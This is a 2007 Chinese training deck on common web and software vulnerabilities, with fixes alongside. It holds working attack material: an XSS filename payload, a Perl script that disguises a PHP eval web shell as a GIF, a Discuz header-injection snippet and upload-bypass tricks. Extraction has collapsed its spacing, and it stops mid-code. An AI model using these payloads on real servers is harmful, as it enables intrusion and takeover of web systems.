常見(jiàn)安全漏洞類型與分析課件

常見(jiàn)漏洞類型與分析信息安全部吳翰清2007-06-51.提綱概述頭號(hào)大敵：SQLInjection被忽視的巨大威脅：跨站腳本漏洞文件上傳，一擊必殺權(quán)限問(wèn)題盲區(qū)：來(lái)自HTTP頭的安全隱患與WebServer結(jié)合產(chǎn)生的漏洞什么樣的漏洞，才叫漏洞？？十年的來(lái)的頑癥緩沖區(qū)溢出攻與防操作系統(tǒng)針對(duì)緩沖區(qū)溢出的保護(hù)漏洞挖掘方法簡(jiǎn)介2.概述Web安全是互聯(lián)網(wǎng)安全的重中之重Web安全的特點(diǎn)與實(shí)現(xiàn)的語(yǔ)言有密切的關(guān)系（ASP/PHP/JSP）與數(shù)據(jù)庫(kù)有緊密聯(lián)系3.頭號(hào)大敵:SQLInjection定義：由于程序中對(duì)用戶輸入檢查不嚴(yán)格，用戶可以提交一段數(shù)據(jù)庫(kù)查詢代碼，根據(jù)程序返回的結(jié)果，獲得某些他想得知的數(shù)據(jù)，這就是所謂的SQLInjection，即SQL注入。SQLInjection的本質(zhì):對(duì)于輸入檢查不充分，導(dǎo)致SQL語(yǔ)句將用戶提交的非法數(shù)據(jù)當(dāng)作語(yǔ)句的一部分來(lái)執(zhí)行。4.示例: Stringuser=request.getParameter("username"); Stringpass=request.getParameter("password"); Stringquery="SELECTidFROMusersWHEREusername="+user+"ANDpassword="+pass; Statementstmt=con.createStatement(query); ResultSetrs=con.executeQuery(query); if(rs.next()) { //登錄成功 intid=rs.getInt(1); ... } else { //登錄失敗 ... }5.正確的編程方法： Stringuser=request.getParameter("username"); Stringpass=request.getParameter("password"); Stringquery="SELECTidFROMusersWHEREusername=?ANDpassword=?"; PreparedStatementstmt=con.prepareStatement(query); stmt.setString(1,user); stmt.setString(2,pass); ResultSetrs=stmt.executeQuery();6.被忽視的巨大威脅：跨站腳本漏洞XSS(CrossSiteScript)XST(HTMLHijacking)7.瀏覽器客戶端的攻擊常常與XSS相結(jié)合<iframesrc=/test/width=0height=0></iframe>8.國(guó)際站XST竊取任意用戶密碼在發(fā)布產(chǎn)品頁(yè)面構(gòu)造惡意html語(yǔ)句9.發(fā)布后，如果某個(gè)用戶查看了此產(chǎn)品，則會(huì)自動(dòng)修改該用戶的注冊(cè)郵箱，或者其他member信息！10.ImageUploadXSSanexampleofsomethingyoumighttestfor:

<IMGSRC="$filename">

Soyouuploadthisfile:

/image-xss/"onerror="alert('XSS')"a=".jpg

Thisendsupmakingthepagelooklike:

<IMGSRC=""onerror="alert('XSS')"a=".jpg">11.解決方案輸出時(shí)使用htmlencode轉(zhuǎn)義字符，使得成為純文本輸出輸入處做filter,過(guò)濾可執(zhí)行的html代碼12.文件上傳，一擊必殺文件上傳漏洞：對(duì)可上傳的文件類型控制不嚴(yán)格，導(dǎo)致可以上傳可執(zhí)行的腳本，從而導(dǎo)致服務(wù)器被控制。13.FCKEditor文件上傳漏洞FCKEditor是一款有多個(gè)語(yǔ)

言版本的(asp,cgi,aspx,php,cfm,...)的在線編輯的class，很多web系統(tǒng)都使用了這

個(gè)class(包括taobao、中文站等許多地方)。14.\editor\filemanager\browser\default\connectors\php\config.php行35-36：$Config['AllowedExtensions']['File']

=array();//允許的上穿類型

$Config['DeniedExtensions']['File']

=array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','dll','reg','cgi');//禁止上傳的類型15.\editor\filemanager\browser\default\connectors\php\commands.phpfunctionFileUpload($resourceType,$currentFolder)

{

$sExtension=substr($sFileName,(strrpos($sFileName,'.')+1));

$sExtension=strtolower($sExtension);//得到文件的后綴（以.為標(biāo)志取最后1個(gè)）

global$Config;

$arAllowed

=$Config['AllowedExtensions'][$resourceType];

$arDenied

=$Config['DeniedExtensions'][$resourceType];

if((count($arAllowed)==0||in_array($sExtension,$arAllowed))&&(count($arDenied)==0||!in_array($sExtension,$arDenied)))//判斷合法后綴

{

$iCounter=0;

while(true)

{

$sFilePath=$sServerDir.$sFileName;

move_uploaded_file($oFile['tmp_name'],$sFilePath);

//上傳注意它保存的文件直接用的$sFilePath=$sServerDir.$sFileName，而沒(méi)有使用$sExtension為后綴

//導(dǎo)致在win下在上傳文件后面加個(gè).來(lái)突破[未測(cè)試][3]

}16.BlackListorWhiteList?如果我們把AllowedExtensions/DeniedExtensions的設(shè)置"反"一下：$Config[‘AllowedExtensions’][‘File’]

=array(‘rar’,‘zip’);//允許的上穿類型

$Config[‘DeniedExtensions’][‘File’]

=array();//禁止上傳的類型把設(shè)置DeniedExtensions改為設(shè)置AllowedExtensions，就不會(huì)出現(xiàn)上面的漏洞了，不過(guò)這樣在某些情況下，照樣可以突破，問(wèn)題還是出在這里：move_uploaded_file($oFile['tmp_name'],$sFilePath);

//上傳注意它保存的文件直接用的$sFilePath=$sServerDir.$sFileName，而沒(méi)有使用$sExtension為后綴在apache下，因?yàn)?apache文件名解析缺陷漏洞"[3]而出現(xiàn)漏洞17.F文件上傳漏洞18.Getimagesize()bypass先看看gif文件頭：

00000000h:

47

49

46

38

39

61

AB

02

E5

03

B3

00

00

00

80

00

;

GIF89a???..€.

G

I

F

8

9

a

$size['0']

$size['1']

$size['0']x$size['1']

=

[AB

02]683

x

[E5

03]99719.構(gòu)造如下perl#!/usr/bin/perl

#The

Script

could

pass

getimagesize()

#gif

size:

99x98

pixels

$gifhead="\x47\x49\x46\x38\x39\x61".

#GIF89a

"\x63\x00".#99

"\x62\x00";#98

$phpcode="\x3c\x3f\x70\x68\x70\x20\x40\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x63\x5d\x29\x3f\x3e";#<?php

@eval($_POST[c])?>

print

$gifhead.$phpcode;20.文件上傳漏洞的解決辦法使用正確的函數(shù)白名單與黑名單禁止上傳目錄有執(zhí)行腳本的權(quán)限不要在url中顯示上傳文件的相對(duì)路徑21.權(quán)限問(wèn)題Auth-Bypass越權(quán)訪問(wèn)22.Elearning系統(tǒng)不經(jīng)授權(quán)充值問(wèn)題23.其中userid;password;ROLE;ORGID;SITEID;的新值為無(wú)效構(gòu)造值。24.正確的做法檢查每個(gè)操作是否進(jìn)行授權(quán)，授權(quán)給誰(shuí)25.盲區(qū)：來(lái)自HTTP頭的安全隱患HTTP頭的注射(Cookie等)26.Discuz4.x/SqlInjection$http_query="'orascii(substring((".$sql."),".$s_num.",1))".$ccheck."/*";…..'X-Forwarded-For'=>$http_query27.正確的做法不要信任來(lái)自http頭中的取的字段28.與WebServer結(jié)合產(chǎn)生的漏洞Apache文件名解析漏洞IISPUT上傳漏洞29.暴力破解驗(yàn)證碼也可以被暴力破解30.暴力破解帳戶鎖定對(duì)暴力破解嘗試進(jìn)行帳戶鎖定風(fēng)險(xiǎn)：可能會(huì)造成惡意嘗試鎖定帳戶31.Apache文件名解析漏洞Phpshell.php.rar.rar.rar.rar.rar.rar.rar.rar.rarApache只會(huì)解析第一個(gè)“.”32.IISPUT上傳漏洞PUT/alert.txtHTTP/1.1Host:Content-Length:69HTTP/1.1100ContinueTherearesomesecureproblemsinyousystem,pleasefixit.ZwelLHTTP/1.1200OK……33.什么樣的漏洞，才叫漏洞？？Web迅雷activex遠(yuǎn)程執(zhí)行漏洞WEB訊雷組件的名稱：ThunderServer.webThunder.1，可以采用JS代碼ActiveXObject("ThunderServer.webThunder.1");來(lái)激活訊雷的組件。其中的關(guān)鍵函數(shù)包括：

SetBrowserWindowData：新建瀏覽器窗口。

SetConfig：設(shè)置WEB訊雷。

HideBrowserWindow：隱藏瀏覽器。

AddTask：添加下載任務(wù)。

SearchTask：搜索任務(wù)，得到任務(wù)ID，文件下載狀態(tài)等詳情。

OpenFile：根據(jù)任務(wù)ID，打開(kāi)文件。34.十年的來(lái)的頑癥緩沖區(qū)溢出棧溢出(控制返回地址[ebp+4])堆溢出(覆蓋堆結(jié)構(gòu)，2次free，覆蓋堆中的指針)整數(shù)溢出(由于整數(shù)的解析欺騙造成的基于堆棧的溢出)35.整數(shù)溢出boolCBlackListMessage::MatchMessage(LPCTSTRszMsg,intnLen,CString&sHint){ //刪除一些忽略的字符 constintnOrgLen=nLen; TCHARszFixedBuf[513]; TCHAR*pCharBuf=NULL;

if(nOrgLen>512)/*[1]*/